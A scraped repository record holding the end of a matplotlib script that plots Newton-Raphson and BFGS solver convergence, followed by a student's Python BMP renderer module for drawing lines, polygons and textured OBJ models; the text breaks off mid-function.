fonts from the document\n \"font.sans-serif\": [],\n \"font.monospace\": [],\n \"axes.labelsize\": 10, # LaTeX default is 10pt font.\n \"text.fontsize\": 10,\n \"legend.fontsize\": 8, # Make the legend/label fonts a little smaller\n \"xtick.labelsize\": 8,\n \"ytick.labelsize\": 8,\n \"figure.figsize\": figsize(0.9), # default fig size of 0.9 textwidth\n \"pgf.preamble\": [\n r\"\\usepackage[utf8x]{inputenc}\", # use utf8 fonts becasue your computer can handle it :)\n r\"\\usepackage[T1]{fontenc}\", # scatters will be generated using this preamble\n ]\n }\nmpl.rcParams.update(pgf_with_latex)\n\nimport matplotlib.pyplot as plt\n\ndef N_explicit(myd1, x):\n return x*np.power(myd1,3.0) -2.0*np.power(myd1, 2.0) +5.6*myd1\n\n# I make my own newfig and savefig functions\ndef newfig(width):\n plt.clf()\n fig = plt.figure(figsize=figsize(width))\n ax = fig.add_subplot(111)\n return fig, ax\n\ndef savefig(filename):\n plt.savefig('{}.pdf'.format(filename))\n\n\n# Simple scatter\nfig, ax = newfig(0.6)\n\npure_nr_x19 = np.loadtxt(\"pure_nr_x19.txt\",delimiter=\",\",skiprows=1,ndmin=2)\nmoded_nr_x19 = np.loadtxt(\"moded_nr_x19.txt\",delimiter=\",\",skiprows=1,ndmin=2)\nmoded_nr_wls_x19 = np.loadtxt(\"moded_nr_wls_x19.txt\",delimiter=\",\",skiprows=1,ndmin=2)\nmoded_nr_bfgs_x19 = np.loadtxt(\"moded_nr_bfgs_x19.txt\",delimiter=\",\",skiprows=1,ndmin=2)\nmoded_nr_bfgs_wls_x19 = np.loadtxt(\"moded_nr_bfgs_wls_x19.txt\",delimiter=\",\",skiprows=1,ndmin=2)\n\n\nheader = [\"pure d\", \"pure N\",\"modified d\", \"modified N\",\"modified wls d\", \"modified wls N\",\"BFGS d\", \"BFGS N\",\"BFGS wls d\", \"BFGS wls N\"]\ncontent = np.array([pure_nr_x19[:,0], pure_nr_x19[:,1], moded_nr_x19[:,0], moded_nr_x19[:,1], moded_nr_wls_x19[:,0], moded_nr_wls_x19[:,1], moded_nr_bfgs_x19[:,0], moded_nr_bfgs_x19[:,1], moded_nr_bfgs_wls_x19[:,0], moded_nr_bfgs_wls_x19[:,1]], ndmin=2)\nprint \"\\\\begin{figure}\"\nprint tabulate(content.transpose(), header, tablefmt=\"latex\")\nprint \"\\\\caption{Solution approximations, $x=.19$}\"\nprint \"\\\\end{figure}\"\n\nax.scatter(pure_nr_x19[:,0], pure_nr_x19[:,1])\nax.plot(np.linspace(0,8.0, 100), N_explicit(np.linspace(0,8.0,100), .19))\nax.set_xlabel('d1')\nax.set_ylabel('N1')\nax.set_title('Pure NR, x=.19')\nsavefig('pure_nr_x19')\n\nax.clear()\nax.scatter(moded_nr_x19[:,0], moded_nr_x19[:,1])\nax.plot(np.linspace(0,8.0, 100), N_explicit(np.linspace(0,8.0,100), .19))\nax.set_xlabel('d1')\nax.set_ylabel('N1')\nax.set_title('Modified NR, x=.19')\nsavefig('moded_nr_x19')\n\nax.clear()\nax.scatter( moded_nr_wls_x19[:,0], moded_nr_wls_x19[:,1])\nax.plot(np.linspace(0,8.0, 100), N_explicit(np.linspace(0,8.0,100), .19))\nax.set_xlabel('d1')\nax.set_ylabel('N1')\nax.set_title('Modified NR with Line Search, x=.19')\nsavefig('moded_nr_wls_x19')\n\nax.clear()\nax.scatter(moded_nr_bfgs_x19[:,0], moded_nr_bfgs_x19[:,1])\nax.plot(np.linspace(0,8.0, 100), N_explicit(np.linspace(0,8.0,100), .19))\nax.set_xlabel('d1')\nax.set_ylabel('N1')\nax.set_title('Modified NR with BFGS, x=.19')\nsavefig('moded_nr_bfgs_x19')\n\nax.clear()\nax.scatter( moded_nr_bfgs_wls_x19[:,0], moded_nr_bfgs_wls_x19[:,1])\nax.plot(np.linspace(0,8.0, 100), N_explicit(np.linspace(0,8.0,100), .19))\nax.set_xlabel('d1')\nax.set_ylabel('N1')\nax.set_title('Modified BR with BFGS and Line Search, x=.19')\nsavefig('moded_nr_bfgs_wls_x19')\n\n\npure_nr_x30 = np.loadtxt(\"pure_nr_x30.txt\",delimiter=\",\",skiprows=1,ndmin=2)\nmoded_nr_x30 = np.loadtxt(\"moded_nr_x30.txt\",delimiter=\",\",skiprows=1,ndmin=2)\nmoded_nr_wls_x30 = np.loadtxt(\"moded_nr_wls_x30.txt\",delimiter=\",\",skiprows=1,ndmin=2)\nmoded_nr_bfgs_x30 = np.loadtxt(\"moded_nr_bfgs_x30.txt\",delimiter=\",\",skiprows=1,ndmin=2)\nmoded_nr_bfgs_wls_x30 = np.loadtxt(\"moded_nr_bfgs_wls_x30.txt\",delimiter=\",\",skiprows=1,ndmin=2)\n\nheader = [\"pure d\", \"pure N\",\"modified d\", \"modified N\",\"modified wls d\", \"modified wls N\",\"BFGS d\", \"BFGS N\",\"BFGS wls d\", \"BFGS wls N\"]\ncontent = np.array([pure_nr_x30[:,0], pure_nr_x30[:,1], moded_nr_x30[:,0], moded_nr_x30[:,1], moded_nr_wls_x30[:,0], moded_nr_wls_x30[:,1], moded_nr_bfgs_x30[:,0], moded_nr_bfgs_x30[:,1], moded_nr_bfgs_wls_x30[:,0], moded_nr_bfgs_wls_x30[:,1]], ndmin=2)\nprint \"\\\\begin{figure}\"\nprint tabulate(content.transpose(), header, tablefmt=\"latex\")\nprint \"\\\\caption{Solution approximations, $x=.30$}\"\nprint \"\\\\end{figure}\"\n\nax.clear()\nax.scatter(pure_nr_x30[:,0], pure_nr_x30[:,1])\nax.plot(np.linspace(0,4.5, 100), N_explicit(np.linspace(0,4.5,100), .30))\nax.set_xlabel('d1')\nax.set_ylabel('N1')\nax.set_title('Pure NR, x=.30')\nsavefig('pure_nr_x30')\n\nax.clear()\nax.scatter(moded_nr_x30[:,0], moded_nr_x30[:,1])\nax.plot(np.linspace(0,4.5, 100), N_explicit(np.linspace(0,4.5,100), .30))\nax.set_xlabel('d1')\nax.set_ylabel('N1')\nax.set_title('Modified NR, x=.30')\nsavefig('moded_nr_x30')\n\nax.clear()\nax.scatter( moded_nr_wls_x30[:,0], moded_nr_wls_x30[:,1])\nax.plot(np.linspace(0,4.5, 100), N_explicit(np.linspace(0,4.5,100), .30))\nax.set_xlabel('d1')\nax.set_ylabel('N1')\nax.set_title('Modified NR with Line Search, x=.30')\nsavefig('moded_nr_wls_x30')\n\nax.clear()\nax.scatter(moded_nr_bfgs_x30[:,0], moded_nr_bfgs_x30[:,1])\nax.plot(np.linspace(0,4.5, 100), N_explicit(np.linspace(0,4.5,100), .30))\nax.set_xlabel('d1')\nax.set_ylabel('N1')\nax.set_title('Modified NR with BFGS, x=.30')\nsavefig('moded_nr_bfgs_x30')\n\nax.clear()\nax.scatter( moded_nr_bfgs_wls_x30[:,0], moded_nr_bfgs_wls_x30[:,1])\nax.plot(np.linspace(0,4.5, 100), N_explicit(np.linspace(0,4.5,100), .30))\nax.set_xlabel('d1')\nax.set_ylabel('N1')\nax.set_title('Modified BR with BFGS and Line Search, x=.30')\nsavefig('moded_nr_bfgs_wls_x30')\n\nax.clear()\npure_nr_x19_conv = np.loadtxt(\"pure_nr_x19_conv.txt\",delimiter=\",\",skiprows=1,ndmin=1)\nmoded_nr_x19_conv = np.loadtxt(\"moded_nr_x19_conv.txt\",delimiter=\",\",skiprows=1,ndmin=1)\nmoded_nr_wls_x19_conv = np.loadtxt(\"moded_nr_wls_x19_conv.txt\",delimiter=\",\",skiprows=1,ndmin=1)\nmoded_nr_bfgs_x19_conv = np.loadtxt(\"moded_nr_bfgs_x19_conv.txt\",delimiter=\",\",skiprows=1,ndmin=1)\nmoded_nr_bfgs_wls_x19_conv = np.loadtxt(\"moded_nr_bfgs_wls_x19_conv.txt\",delimiter=\",\",skiprows=1,ndmin=1)\n\nheader = [\"pure\",\"modified\",\"modified wls\",\"BFGS\",\"BFGS wls\"]\ncontent = np.ndarray(shape =(40,5))\ncontent[:,0] = pure_nr_x19_conv\ncontent[:,1] = moded_nr_x19_conv\ncontent[:,2] = moded_nr_wls_x19_conv\ncontent[:,3] = moded_nr_bfgs_x19_conv\ncontent[:,4] = moded_nr_bfgs_wls_x19_conv\n\nprint \"\\\\begin{figure}\"\nprint tabulate(content, header, tablefmt=\"latex\")\nprint \"\\\\caption{Number of iterations, $x=.19$}\"\nprint \"\\\\end{figure}\"\n\nax.clear()\nax.scatter( range(1,len(pure_nr_x19_conv)+1), pure_nr_x19_conv)\nax.set_xlabel('Load Step')\nax.set_ylabel('Num Iterations')\nax.set_title('Pure NR, x=.19')\nsavefig('pure_nr_x19_conv')\n\nax.clear()\nax.scatter(range(1,len(moded_nr_x19_conv)+1) ,moded_nr_x19_conv)\nax.set_xlabel('Load Step')\nax.set_ylabel('Num Iterations')\nax.set_title('Modified NR, x=.19')\nsavefig('moded_nr_x19_conv')\n\nax.clear()\nax.scatter( range(1,len(moded_nr_wls_x19_conv)+1), moded_nr_wls_x19_conv)\nax.set_xlabel('Load Step')\nax.set_ylabel('Num Iterations')\nax.set_title('Modified NR with Line Search, x=.19')\nsavefig('moded_nr_wls_x19_conv')\n\nax.clear()\nax.scatter( range(1,len(moded_nr_bfgs_x19_conv)+1), moded_nr_bfgs_x19_conv)\nax.set_xlabel('Load Step')\nax.set_ylabel('Num Iterations')\nax.set_title('Modified NR with BFGS, x=.19')\nsavefig('moded_nr_bfgs_x19_conv')\n\nax.clear()\nax.scatter( range(1,len(moded_nr_bfgs_wls_x19_conv)+1), moded_nr_bfgs_wls_x19_conv)\nax.set_xlabel('Load Step')\nax.set_ylabel('Num Iterations')\nax.set_title('Modified BR with BFGS and Line Search, x=.19')\nsavefig('moded_nr_bfgs_wls_x19_conv')\n\n\npure_nr_x30_conv = np.loadtxt(\"pure_nr_x30_conv.txt\",delimiter=\",\",skiprows=1,ndmin=1)\nmoded_nr_x30_conv = np.loadtxt(\"moded_nr_x30_conv.txt\",delimiter=\",\",skiprows=1,ndmin=1)\nmoded_nr_wls_x30_conv = np.loadtxt(\"moded_nr_wls_x30_conv.txt\",delimiter=\",\",skiprows=1,ndmin=1)\nmoded_nr_bfgs_x30_conv = np.loadtxt(\"moded_nr_bfgs_x30_conv.txt\",delimiter=\",\",skiprows=1,ndmin=1)\nmoded_nr_bfgs_wls_x30_conv = np.loadtxt(\"moded_nr_bfgs_wls_x30_conv.txt\",delimiter=\",\",skiprows=1,ndmin=1)\n\nheader = [\"pure\",\"modified\",\"modified wls\",\"BFGS\",\"BFGS wls\"]\ncontent = np.ndarray(shape =(40,5))\ncontent[:,0] = pure_nr_x30_conv\ncontent[:,1] = moded_nr_x30_conv\ncontent[:,2] = moded_nr_wls_x30_conv\ncontent[:,3] = moded_nr_bfgs_x30_conv\ncontent[:,4] = moded_nr_bfgs_wls_x30_conv\n\nprint \"\\\\begin{figure}\"\nprint tabulate(content, header, tablefmt=\"latex\")\nprint \"\\\\caption{Number of iterations, $x=.30$}\"\nprint \"\\\\end{figure}\"\n\nax.clear()\nax.scatter( range(1,len(pure_nr_x30_conv)+1), pure_nr_x30_conv )\nax.set_xlabel('Load Step')\nax.set_ylabel('Num Iterations')\nax.set_title('Pure NR, x=.30')\nsavefig('pure_nr_x30_conv')\n\nax.clear()\nax.scatter( range(1,len(moded_nr_x30_conv)+1), moded_nr_x30_conv)\nax.set_xlabel('Load Step')\nax.set_ylabel('Num Iterations')\nax.set_title('Modified NR, x=.30')\nsavefig('moded_nr_x30_conv')\n\nax.clear()\nax.scatter( range(1,len(moded_nr_wls_x30_conv)+1), moded_nr_wls_x30_conv)\nax.set_xlabel('Load Step')\nax.set_ylabel('Num Iterations')\nax.set_title('Modified NR with Line Search, x=.30')\nsavefig('moded_nr_wls_x30_conv')\n\nax.clear()\nax.scatter( range(1,len(moded_nr_bfgs_x30_conv)+1), moded_nr_bfgs_x30_conv)\nax.set_xlabel('Load Step')\nax.set_ylabel('Num Iterations')\nax.set_title('Modified NR with BFGS, x=.30')\nsavefig('moded_nr_bfgs_x30_conv')\n\nax.clear()\nax.scatter( range(1,len(moded_nr_bfgs_wls_x30_conv)+1), moded_nr_bfgs_wls_x30_conv)\nax.set_xlabel('Load Step')\nax.set_ylabel('Num Iterations')\nax.set_title('Modified BR with BFGS and Line Search, x=.30')\nsavefig('moded_nr_bfgs_wls_x30_conv')\n\nax.clear()\nax.plot(np.linspace(0,8.0, 100), N_explicit(np.linspace(0,8.0,100), .19))\nax.set_xlabel('d1')\nax.set_ylabel('N1')\nax.set_title('Exact N1 vs d1, x=.19')\nsavefig('exact_x19')\n\nax.clear()\nax.plot(np.linspace(0,4.5, 100), N_explicit(np.linspace(0,4.5,100), .30))\nax.set_xlabel('d1')\nax.set_ylabel('N1')\nax.set_title('Exact N1 vs d1, x=.30')\nsavefig('exact_x30')\n" } ]
2
LuisDiego19FV/Graficas-SR6
https://github.com/LuisDiego19FV/Graficas-SR6
515280cfb732ea66ecfc46a34b4623f31161448d
60d03755d8457216ba3306c3158aed4025f319df
e49075615eae2639f5f468e2f5ab9db1e8c36def
refs/heads/master
2020-05-02T01:30:53.455147
2019-03-26T00:52:41
2019-03-26T00:52:41
177,687,389
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6151432991027832, "alphanum_fraction": 0.6343932747840881, "avg_line_length": 24.22661781311035, "blob_id": "193043da01f00dcbc4c2052bef1b62854b54e39c", "content_id": "b5aee9933d8beff7ace7b770b200e0826e15b156", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14026, "license_type": "no_license", "max_line_length": 146, "num_lines": 556, "path": "/bmp_processor.py", "repo_name": "LuisDiego19FV/Graficas-SR6", "src_encoding": "UTF-8", "text": "#bmp_processor\n#Por Luis Diego Fernandez\n#V_A\nimport sys\nimport math\nimport struct\nimport random\nimport numpy as np\n\nclass bmpImage:\n\n\t# Define init(). Attributes Initializer\n\tdef __init__(self, new_width, new_height):\n\t\t# image data\n\t\tself.image_data = bytes()\n\n\t\t# image attributes\n\t\tself.width = 0\n\t\tself.height = 0\n\t\tself.bits_per_pixel = 0\n\t\tself.row_bytes = 0\n\t\tself.row_padding = 0\n\n\t\t# viewport\n\t\tself.vp_x = 0\n\t\tself.vp_y = 0\n\t\tself.vp_width = 0\n\t\tself.vp_height = 0\n\n\t\t# clear colors\n\t\tself.clearRgbRed = 0\n\t\tself.clearRgbGreen = 0\n\t\tself.clearRgbBlue = 0\n\n\t\t# paint colors\n\t\tself.paintRgbRed = 0\n\t\tself.paintRgbGreen = 0\n\t\tself.paintRgbBlue = 0\n\n\t\t# texture image\n\t\tself.textureImg = []\n\t\tself.texture_width = 0\n\t\tself.texture_height = 0\n\t\tself.texture_width_ratio = 0\n\t\tself.texture_height_ratio = 0\n\n\t\t# add values\n\t\tself.constructImage(new_width, new_height)\n\n\t# Define constructImage(int, int). Creates the header for the BMP image\n\t# returns: 0 on success\n\tdef constructImage(self, new_width, new_height):\n\n\t\tself.width = new_width\n\t\tself.height = new_height\n\t\tself.row_bytes = new_width * 4\n\t\tself.row_padding = int(math.ceil(int(self.row_bytes / 4.0))) * 4 - self.row_bytes\n\n\t\tdata = bytes('BM', 'utf-8')\n\t\tdata += struct.pack('i', 26 + 4 * self.width * self.height)\n\t\tdata += struct.pack('h', 0)\n\t\tdata += struct.pack('h', 0)\n\t\tdata += struct.pack('i', 26)\n\t\tdata += struct.pack('i', 12)\n\t\tdata += struct.pack('h', self.width)\n\t\tdata += struct.pack('h', self.height)\n\t\tdata += struct.pack('h', 1)\n\t\tdata += struct.pack('h', 32)\n\n\t\tself.image_data = data\n\n\t\tself.z_buffer = [\n\t [-float('inf') for x in range(self.width)]\n\t\t for y in range(self.height)\n\t ]\n\n\t\treturn 0\n\n\t# Define glAbsolutePointPaint(int, int). Paints an individual pixel\n\t# returns: 0 on success\n\tdef glAbsolutePoint(self,x, y):\n\n\t\t# changes the data of an individual pixel\n\t\tdata = self.image_data[:26 + ((y - 1) * (self.width + self.row_padding) + (x - 1)) * 4]\n\t\tdata += self.rgbToByte(self.paintRgbRed, self.paintRgbGreen, self.paintRgbBlue)\n\t\tdata += self.image_data[30 + ((y - 1) * (self.width + self.row_padding) + (x - 1)) * 4:]\n\n\t\tself.image_data = data\n\n\t\treturn 0\n\n\t# Define glAbsolutePointPaint(int, int). Paints an individual pixel\n\t# returns: 0 on success\n\tdef glAbsolutePointWithColor(self,x, y,color):\n\n\t\t# changes the data of an individual pixel\n\t\tdata = self.image_data[:26 + ((y - 1) * (self.width + self.row_padding) + (x - 1)) * 4]\n\t\tdata += color\n\t\tdata += self.image_data[30 + ((y - 1) * (self.width + self.row_padding) + (x - 1)) * 4:]\n\n\t\tself.image_data = data\n\n\t\treturn 0\n\n\t# Define glLine(). Paints a line from point (xi,yi) to (xf,yf)\n\t# returns: 0 on success\n\tdef glAbsoluteLine(self,xi,yi,xf,yf):\n\n\t\tdy = yf - yi\n\t\tdx = xf - xi\n\n\t\tif (dx == 0):\n\t\t\tfor y in range(dy + 1):\n\t\t\t\tself.glAbsolutePoint(xi,y + yi)\n\n\t\t\treturn 0\n\n\t\tm = dy/dx\n\t\tgrad = m <= 1 and m >= 0\n\n\t\tif grad and xi > xf:\n\t\t\txi, xf = xf, xi\n\t\t\tyi, yf = yf, yi\n\t\t\tdy = yf - yi\n\t\t\tdx = xf - xi\n\t\t\tm = dy/dx\n\t\t\tgrad = m <= 1 and m >= 0\n\n\t\telif yi > yf:\n\t\t\txi, xf = xf, xi\n\t\t\tyi, yf = yf, yi\n\t\t\tdy = yf - yi\n\t\t\tdx = xf - xi\n\t\t\tm = dy/dx\n\t\t\tgrad = m <= 1 and m >= 0\n\n\t\tif (grad):\n\t\t\tfor x in range(dx + 1):\n\t\t\t\ty = round(m*x + yi)\n\t\t\t\tself.glAbsolutePoint(x+xi,y)\n\t\telse:\n\t\t\tm = 1/m\n\t\t\tfor y in range(dy + 1):\n\t\t\t\tx = round(m*y + xi)\n\t\t\t\tself.glAbsolutePoint(x,y + yi)\n\n\t\treturn 0\n\n\t# Define glClear(). It paints the whole image in a specific rgb color.\n\t# returns: 0 on success\n\tdef glClear(self):\n\n\t\tfirst = True\n\t\tpixel = self.rgbToByte(self.clearRgbRed, self.clearRgbGreen, self.clearRgbBlue)\n\n\t\tfor y in range(self.height):\n\n\t\t\tif (first):\n\t\t\t\tdata = pixel * self.width\n\t\t\t\tfirst = False\n\t\t\telse:\n\t\t\t\tdata += pixel * self.width\n\n\t\t\t# padding for each line\n\t\t\tfor x in range(self.row_padding):\n\t\t\t\tdata += bytes('\\x00', 'utf-8')\n\n\t\tself.image_data = self.image_data[:27] + data\n\n\t\treturn 0\n\n\t#Define glClearColor(float, float, float). It change the colors used for the glClear\n\t# returns: 0 on success\n\tdef glClearColor(self,r,g,b):\n\n\t\t# the rgb data for glClear is store after converting the rgb numbers from float to integers\n\t\t# on a scale from 0 to 255\n\t\tself.clearRgbRed = int(math.ceil(float(r/1)*255))\n\t\tself.clearRgbGreen = int(math.ceil(float(g/1)*255))\n\t\tself.clearRgbBlue = int(math.ceil(float(b/1)*255))\n\n\t\treturn 0\n\n\n\t# Define glColor(float, float, float). It change the colors used for painting a specific pixel\n\t# returns: 0 on success\n\tdef glColor(self,r,g,b):\n\n\t\t# the rgb data for the pixel painting is store after converting the rgb numbers from float\n\t\t# to integers on a scale from 0 to 255\n\t\tself.paintRgbRed = int(math.ceil(float(r/1)*255))\n\t\tself.paintRgbGreen = int(math.ceil(float(g/1)*255))\n\t\tself.paintRgbBlue = int(math.ceil(float(b/1)*255))\n\n\t\treturn 0\n\n\tdef glLoadTextureImage(self, texture, scale_X, scale_Y):\n\t\timage = open(texture + '.bmp', \"rb\")\n\n\t\timage.seek(10)\n\t\theader_size = struct.unpack(\"=l\", image.read(4))[0]\n\t\timage.seek(18)\n\n\t\tself.texture_width = struct.unpack(\"=l\", image.read(4))[0]\n\t\tself.texture_height = struct.unpack(\"=l\", image.read(4))[0]\n\t\tself.texture_width_ratio = (self.texture_width/self.width)/scale_X\n\t\tself.texture_height_ratio = (self.texture_height/self.height)/scale_Y\n\t\tself.textureImg = []\n\t\timage.seek(header_size)\n\t\tfor y in range(self.texture_height):\n\t\t\tself.textureImg.append([])\n\t\t\tfor x in range(self.texture_width):\n\t\t\t\tb = ord(image.read(1))\n\t\t\t\tg = ord(image.read(1))\n\t\t\t\tr = ord(image.read(1))\n\t\t\t\tself.textureImg[y].append(self.rgbToByte(r,g,b))\n\n\t\timage.close()\n\n\t\treturn 0\n\n\tdef glObjMover(self, vertices, scale, translateX, translateY):\n\n\t\tnew_vertices = []\n\n\t\t# transform np\n\t\tscale_it = np.matrix([\n\t\t [scale,0,0],\n\t\t [0,scale,0],\n\t\t [0,0,1]\n\t\t])\n\n\t\tfor vertice in vertices:\n\t\t\tvertice = np.matmul(scale_it,vertice)\n\t\t\tvertice = np.sum([vertice,[translateX,translateY,0]],axis=0)\n\n\t\t\tnew_vertices.append([vertice.item(0),vertice.item(1),vertice.item(2)])\n\n\t\treturn new_vertices\n\n\tdef glObjRotate(self,vertices,angle):\n\n\t\tnew_vertices = []\n\n\t\t# transform np\n\t\trotate_it = np.matrix([\n\t\t [np.cos(angle), -np.sin(angle), 0],\n\t\t [np.sin(angle), np.cos(angle), 0],\n\t\t [0.01, 0.001, 1]\n\t\t])\n\n\t\tfor vertice in vertices:\n\n\t\t\tvertice = np.matmul(rotate_it,vertice)\n\t\t\tnew_vertices.append([vertice.item(0),vertice.item(1),vertice.item(2)])\n\n\t\treturn new_vertices\n\n\n\tdef glObjReader(self, objectName):\n\n\t\t# opens obj file\n\t\tfile = open(objectName + '.obj')\n\t\tlines = file.read().splitlines()\n\n\t\t# vertices and faces\n\t\tvertices = []\n\t\ttextures = []\n\t\tfaces = []\n\n\t\t# reads each line and stores each vertice and face\n\t\tfor line in lines:\n\n\t\t\t# gets the prefix and the values of either a vertice or a face\n\t\t\ttry:\n\t\t\t\tprefix, value = line.split(' ',1)\n\t\t\texcept ValueError:\n\t\t\t\tcontinue\n\n\t\t\t# reads and store vertices\n\t\t\tif prefix == 'v':\n\t\t\t\ttry:\n\t\t\t\t\tvertices.append(list(map(float, value.split(' '))))\n\t\t\t\texcept ValueError:\n\t\t\t\t\tbreak\n\n\t\t\t# reads and store vertices\n\t\t\tif prefix == 'vt':\n\t\t\t\ttry:\n\t\t\t\t\ttextures.append(list(map(float, value.split(' '))))\n\t\t\t\texcept ValueError:\n\t\t\t\t\tbreak\n\n\t\t\t# reads and store faces\n\t\t\telif prefix == 'f':\n\t\t\t\tsection = []\n\t\t\t\tfor face in value.split(' '):\n\t\t\t\t\ttry:\n\t\t\t\t\t\tsection.append(list(map(int, face.split('/'))))\n\t\t\t\t\texcept ValueError:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tsection.append(list(map(int, face.split('//'))))\n\t\t\t\t\t\texcept ValueError:\n\t\t\t\t\t\t\tbreak\n\t\t\t\tfaces.append(section)\n\n\t\t# 2D list to return with the vertices and faces\n\t\tobject_skeleton = [vertices,faces,textures]\n\n\t\treturn object_skeleton\n\n\n\t# Define glObjWriter(). Makes BMP out of a flat .obj\n\t# Return 0 on success\n\tdef glObjWriter(self,object_skeleton,scale,translate_x, translate_y,angle = 0):\n\n\t\t# vertices and faces\n\t\tvertices = self.glObjMover(object_skeleton[0],1/scale,translate_x,translate_y)\n\t\tif angle != 0:\n\t\t\tvertices = self.glObjRotate(vertices,angle)\n\n\t\tfaces = object_skeleton[1]\n\t\ttextures = object_skeleton[2]\n\n\t\t# counter\n\t\tcounter = 0\n\n\t\t# draws each face of the object\n\t\tfor face in faces:\n\n\t\t\tcounter += 1\n\t\t\tif counter%50 == 0:\n\t\t\t\tsys.stdout.write('\\r' + str(counter/len(faces)*100)[0:4] + \"% complete\")\n\n\t\t\tpollygon = []\n\t\t\ttexturesToPaint = []\n\t\t\tz_avg = 0\n\t\t\tpaint_pol = True\n\n\t\t\t# gets all the vertices in a face\n\t\t\tfor i in range(len(face)):\n\t\t\t\tx = int((vertices[face[i][0]-1][0])*self.width)\n\t\t\t\ty = int((vertices[face[i][0]-1][1])*self.height)\n\t\t\t\tz = int(vertices[face[i][0]-1][2])\n\n\t\t\t\ttex_X = textures[face[i][1]-1][0]\n\t\t\t\ttex_Y = textures[face[i][1]-1][1]\n\n\t\t\t\tz_avg += z\n\n\t\t\t\ttexturesToPaint.append([tex_X,tex_Y])\n\t\t\t\tpollygon.append([x,y])\n\n\t\t\t\tif x >= self.width or y >= self.height:\n\t\t\t\t\tpaint_pol = False\n\n\t\t\t\tif x < 0 or y < 0:\n\t\t\t\t\tpaint_pol = False\n\n\t\t\t# avarage cooordinate\n\t\t\tz_avg = z_avg/len(face)\n\n\t\t\t# paints the face\n\t\t\tif paint_pol:\n\t\t\t\tself.glPolygonMaker(pollygon,texturesToPaint,z_avg)\n\n\t\tsys.stdout.write('\\r' + \"100% complete \")\n\n\t\treturn 0\n\n\t# Define glPolygonMaker(). Paints a figure given the vertices in a list.\n\t# returns: 0 on success\n\tdef glPolygonMaker(self, vertices, textures, z_coordinate):\n\n\t\t# lista para guardar los puntos de la figura\n\t\tfigurePoints = []\n\n\t\t# se reutiliza el codigo para hacer lineas solo que se guarda cada punto\n\t\t# que se pinta en figurePoints\n\t\tfor i in range(len(vertices)):\n\n\t\t\txi = vertices[i][0]\n\t\t\tyi = vertices[i][1]\n\n\t\t\tif i == len(vertices)-1:\n\t\t\t\txf = vertices[0][0]\n\t\t\t\tyf = vertices[0][1]\n\n\t\t\telse:\n\t\t\t\txf = vertices[i+1][0]\n\t\t\t\tyf = vertices[i+1][1]\n\n\t\t\tdy = yf - yi\n\t\t\tdx = xf - xi\n\n\t\t\tif (dx == 0):\n\t\t\t\tif dy > 0:\n\t\t\t\t\tfor y in range(dy + 1):\n\t\t\t\t\t\tfigurePoints.append([xi,y + yi])\n\t\t\t\t\t\tif z_coordinate >= self.z_buffer[xi][y+yi]:\n\t\t\t\t\t\t\tself.z_buffer[xi][y+yi] = z_coordinate\n\t\t\t\telse:\n\t\t\t\t\tfor y in range(abs(dy) + 1):\n\t\t\t\t\t\tfigurePoints.append([xi,y + yf])\n\t\t\t\t\t\tif z_coordinate >= self.z_buffer[xi][y+yf]:\n\t\t\t\t\t\t\tself.z_buffer[xi][y+yf] = z_coordinate\n\t\t\telse:\n\t\t\t\tm = dy/dx\n\t\t\t\tgrad = m <= 1 and m >= 0\n\n\t\t\t\tif grad and xi > xf:\n\t\t\t\t\txi, xf = xf, xi\n\t\t\t\t\tyi, yf = yf, yi\n\t\t\t\t\tdy = yf - yi\n\t\t\t\t\tdx = xf - xi\n\t\t\t\t\tm = dy/dx\n\t\t\t\t\tgrad = m <= 1 and m >= 0\n\n\t\t\t\telif yi > yf:\n\t\t\t\t\txi, xf = xf, xi\n\t\t\t\t\tyi, yf = yf, yi\n\t\t\t\t\tdy = yf - yi\n\t\t\t\t\tdx = xf - xi\n\t\t\t\t\tm = dy/dx\n\t\t\t\t\tgrad = m <= 1 and m >= 0\n\n\t\t\t\tif (grad):\n\t\t\t\t\tfor x in range(dx + 1):\n\t\t\t\t\t\ty = round(m*x + yi)\n\t\t\t\t\t\tfigurePoints.append([x+xi,y])\n\t\t\t\t\t\tif z_coordinate >= self.z_buffer[x+xi][y]:\n\t\t\t\t\t\t\tself.z_buffer[x+xi][y] = z_coordinate\n\t\t\t\telse:\n\t\t\t\t\tm = 1/m\n\t\t\t\t\tfor y in range(dy + 1):\n\t\t\t\t\t\tx = round(m*y + xi)\n\t\t\t\t\t\tfigurePoints.append([x,y + yi])\n\t\t\t\t\t\tif z_coordinate >= self.z_buffer[x][y+yi]:\n\t\t\t\t\t\t\tself.z_buffer[x][y+yi] = z_coordinate\n\n\n\t\t# avoids processing the same point twice.\n\t\tavoidPoints = []\n\t\tcounter_for_tex_Y = 0\n\n\t\tfor point in figurePoints:\n\n\t\t\tif (int(textures[0][1]*self.texture_height)-1 + counter_for_tex_Y) > self.texture_height:\n\t\t\t\tcounter_for_tex_Y -= self.texture_height_ratio\n\n\t\t\tif point[1] not in avoidPoints:\n\n\t\t\t\t# finds which points are in the same y coordinate in the figure.\n\t\t\t\tpointsToPaint = []\n\t\t\t\tfor i in range(len(figurePoints)):\n\t\t\t\t\tif figurePoints[i][1] == point[1]:\n\t\t\t\t\t\tpointsToPaint.append(figurePoints[i][0])\n\n\n\t\t\t\t# order the points\n\t\t\t\tpointsToPaint.sort()\n\t\t\t\tpointsLen = len(pointsToPaint)\n\n\t\t\t\tcounter_for_tex_X = 0\n\n\t\t\t\tif pointsLen != 0:\n\t\t\t\t\tfor xToDraw in range(pointsToPaint[0],pointsToPaint[pointsLen-1]+1):\n\t\t\t\t\t\tif z_coordinate >= self.z_buffer[xToDraw][point[1]]:\n\n\t\t\t\t\t\t\tif (int(textures[0][1]*self.texture_width)-1 + counter_for_tex_X) > self.texture_width:\n\t\t\t\t\t\t\t\tcounter_for_tex_X -= self.texture_width_ratio\n\n\t\t\t\t\t\t\tself.glAbsolutePointWithColor(xToDraw,point[1], \\\n\t\t\t\t\t\t\tself.textureImg[int(textures[0][1]*self.texture_height + counter_for_tex_Y)-1][int(textures[0][0]*self.texture_width + counter_for_tex_X)])\n\t\t\t\t\t\t\tself.z_buffer[xToDraw][point[1]] = z_coordinate\n\t\t\t\t\t\tcounter_for_tex_X += self.texture_width_ratio\n\n\t\t\t\tavoidPoints.append(point[1])\n\n\t\t\tcounter_for_tex_Y += self.texture_height_ratio\n\n\t\treturn 0\n\n\t# Define glVertex(int, int). Paints an individual pixel\n\t# returns: 0 on success\n\tdef glVertex(self,x, y):\n\n\t\t# painting cordinates\n\t\tpcx = self.vp_x + 